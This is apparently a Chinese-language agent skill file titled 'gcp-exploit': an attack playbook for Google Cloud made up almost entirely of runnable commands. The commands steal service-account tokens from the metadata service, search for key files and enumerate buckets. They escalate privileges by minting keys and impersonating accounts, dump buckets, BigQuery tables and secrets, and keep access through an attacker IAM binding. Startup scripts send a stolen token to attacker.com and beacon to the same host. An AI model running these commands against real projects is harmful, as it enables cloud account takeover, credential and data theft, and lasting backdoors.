| name | gcp-exploit |
| description | GCP 云环境攻击方法论。当目标使用 Google Cloud Platform、发现 GCP Service Account/Metadata/Storage Bucket 时使用。覆盖 Metadata 服务利用、Service Account 密钥窃取、IAM 提权、GKE 逃逸、Storage Bucket 枚举 |
| metadata | {"tags":"gcp,google cloud,service account,metadata,iam,gke,bucket,云攻击,GCP提权","category":"cloud","mitre_attack":"T1078.004,T1552.005,T1530,T1611"} |
GCP 云环境攻击方法论
与 AWS 的区别:GCP 的 IAM 继承模型 + Service Account 密钥机制 = 独特的攻击路径
⛔ 深入参考
Phase 1: 初始访问与信息收集
1.1 Metadata 服务利用(SSRF → GCP 凭据)
curl -H "Metadata-Flavor: Google" \
http://metadata.google.internal/computeMetadata/v1/
curl -H "Metadata-Flavor: Google" \
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
curl -H "Metadata-Flavor: Google" \
"http://metadata.google.internal/computeMetadata/v1/project/project-id"
curl -H "Metadata-Flavor: Google" \
"http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true"
curl -H "Metadata-Flavor: Google" \
"http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys"
1.2 Service Account 密钥发现
grep -r "private_key_id" /path/to/code/
find / -name "*.json" -exec grep -l "client_email.*iam.gserviceaccount.com" {} \;
1.3 Bucket 枚举
for prefix in target target-prod target-dev target-backup target-assets; do
status=$(curl -s -o /dev/null -w "%{http_code}" "https://storage.googleapis.com/$prefix")
echo "$prefix: $status"
done
python3 gcpbucketbrute.py -k target -o results.txt
Phase 2: 认证与权限确认
gcloud auth activate-service-account --key-file=stolen-key.json
gcloud config set auth/access_token_file /tmp/token.txt
gcloud auth list
gcloud config get-value project
gcloud projects get-iam-policy $(gcloud config get-value project) \
--flatten="bindings[].members" \
--filter="bindings.members:$(gcloud config get-value account)"
gcloud asset search-all-iam-policies --query="policy:roles/owner"
Phase 3: IAM 提权
3.1 常见提权路径
GCP IAM 提权路径:
├─ iam.serviceAccountKeys.create → 给高权限 SA 创建新密钥
├─ iam.serviceAccounts.getAccessToken → 直接获取其他 SA 的 token
├─ iam.serviceAccounts.implicitDelegation → 链式委托
├─ iam.serviceAccounts.signBlob → 签署 JWT 冒充其他 SA
├─ iam.serviceAccounts.signJwt → 直接签署 JWT
├─ deploymentmanager.deployments.create → 以 DM SA 身份部署资源
├─ cloudfunctions.functions.create → 创建函数以高权限 SA 执行
├─ compute.instances.create → 创建 VM 挂载高权限 SA
├─ run.services.create → 创建 Cloud Run 挂载 SA
└─ orgpolicy.policy.set → 修改组织策略
3.2 利用示例
gcloud iam service-accounts keys create /tmp/key.json \
--iam-account=high-priv-sa@project.iam.gserviceaccount.com
gcloud auth print-access-token --impersonate-service-account=target-sa@project.iam.gserviceaccount.com
gcloud functions deploy privesc \
--runtime python39 \
--trigger-http \
--service-account=high-priv-sa@project.iam.gserviceaccount.com \
--source=./malicious-function/
gcloud compute instances create privesc-vm \
--service-account=high-priv-sa@project.iam.gserviceaccount.com \
--scopes=cloud-platform \
--metadata=startup-script='curl -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/service-accounts/default/token > /tmp/token; curl https://attacker.com/exfil -d @/tmp/token'
Phase 4: 数据访问
gsutil ls gs://
gsutil ls -r gs://target-bucket/
gsutil cp gs://bucket/secret.txt ./
gsutil cp -r gs://bucket/ ./local-dump/
bq ls
bq ls project:dataset
bq query "SELECT * FROM \`project.dataset.table\` LIMIT 100"
bq extract project:dataset.table gs://bucket/export.csv
gcloud secrets list
gcloud secrets versions access latest --secret=db-password
gcloud firestore export gs://bucket/firestore-dump
Phase 5: 持久化
gcloud iam service-accounts keys create backdoor.json \
--iam-account=existing-sa@project.iam.gserviceaccount.com
gcloud projects add-iam-policy-binding PROJECT \
--member='user:attacker@gmail.com' --role='roles/editor'
gcloud compute instances add-metadata INSTANCE \
--metadata=startup-script='curl https://attacker.com/beacon'
工具速查
| 工具 | 用途 |
|---|
| gcloud CLI | GCP 官方工具 |
| GCPBucketBrute | Bucket 枚举 |
| ScoutSuite | 多云安全审计 |
| Prowler | GCP 安全检查 |
| GCP IAM Privilege Escalation | 提权检查工具 |
| Hayat | GCP 攻击框架 |